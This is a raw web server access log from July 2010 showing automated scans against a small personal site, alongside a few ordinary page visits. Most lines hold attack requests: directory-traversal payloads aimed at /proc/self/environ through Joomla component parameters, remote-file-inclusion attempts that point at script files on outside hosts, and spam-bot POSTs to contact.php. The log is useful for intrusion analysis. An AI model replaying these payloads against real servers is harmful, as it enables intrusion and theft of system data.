174.121.93.221 - - [05/Jul/2010:01:28:54 -0500] "GET /logs//index2.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:29:06 -0500] "GET /logs/access_log.1276819200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.241 - - [05/Jul/2010:01:29:10 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:10 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:10 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.75.115 - - [05/Jul/2010:01:29:34 -0500] "GET /logs/access_log.1277251200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.241 - - [05/Jul/2010:01:29:35 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:35 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:35 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:41 -0500] "GET /logs/access_log.1276214400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:41 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:41 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:29:59 -0500] "GET /logs/access_log.1276214400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:30:00 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:30:00 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:30:00 -0500] "GET /logs/access_log.1275609600/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [05/Jul/2010:01:30:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
174.121.93.221 - - [05/Jul/2010:01:30:55 -0500] "GET //index2.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:01:30:56 -0500] "GET //index2.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
94.23.234.215 - - [05/Jul/2010:01:31:03 -0500] "GET //index2.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
174.142.61.241 - - [05/Jul/2010:01:31:05 -0500] "GET /logs/access_log.1276128000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.234.215 - - [05/Jul/2010:01:31:07 -0500] "GET //index2.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
174.142.61.241 - - [05/Jul/2010:01:31:27 -0500] "GET /logs/access_log.1276819200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:32:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
151.1.253.1 - - [05/Jul/2010:01:34:02 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
151.1.253.1 - - [05/Jul/2010:01:34:03 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
151.1.253.1 - - [05/Jul/2010:01:34:10 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
151.1.253.1 - - [05/Jul/2010:01:34:41 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.142.75.115 - - [05/Jul/2010:01:35:05 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.136.63.119 - - [05/Jul/2010:01:35:16 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
174.142.61.241 - - [05/Jul/2010:01:35:21 -0500] "GET /logs/access_log.1277251200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:35:28 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.75.115 - - [05/Jul/2010:01:35:41 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:35:44 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.136.63.119 - - [05/Jul/2010:01:35:49 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:35:54 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
174.142.75.115 - - [05/Jul/2010:01:35:55 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.229.22.22 - - [05/Jul/2010:01:35:56 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:56 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:56 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:56 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:56 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:57 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:01:35:58 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""Dex Bot Search"
174.142.61.241 - - [05/Jul/2010:01:36:38 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:36:44 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:01:36:48 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:01:36:48 -0500] "GET /logs/access_log.1277164800/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:01:36:48 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:37:17 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
66.98.224.33 - - [05/Jul/2010:01:37:20 -0500] "GET /logs/access_log.1277164800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:01:37:20 -0500] "GET /logs/access_log.1277164800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:01:37:21 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:01:37:21 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:01:37:21 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12135 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:01:37:21 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12135 "-""libwww-perl/5.65"
174.142.61.241 - - [05/Jul/2010:01:37:22 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:24 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:25 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:25 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:37:25 -0500] "POST /logs/access_log.1266710400%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
174.142.75.115 - - [05/Jul/2010:01:37:35 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:37:35 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:37:35 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:38:41 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:38:41 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:38:41 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
110.139.60.147 - - [05/Jul/2010:01:39:09 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:39:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
92.60.176.46 - - [05/Jul/2010:01:39:11 -0500] "GET /logs/access_log.1277251200/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
110.139.60.147 - - [05/Jul/2010:01:39:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:39:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:39:32 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:39:32 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:39:36 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
77.221.130.30 - - [05/Jul/2010:01:39:41 -0500] "GET /bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:39:41 -0500] "GET /logs/access_log.1276819200%20%20/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:39:41 -0500] "GET /logs/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
174.142.75.115 - - [05/Jul/2010:01:39:47 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:39:47 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:39:48 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.213.231.211 - - [05/Jul/2010:01:40:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
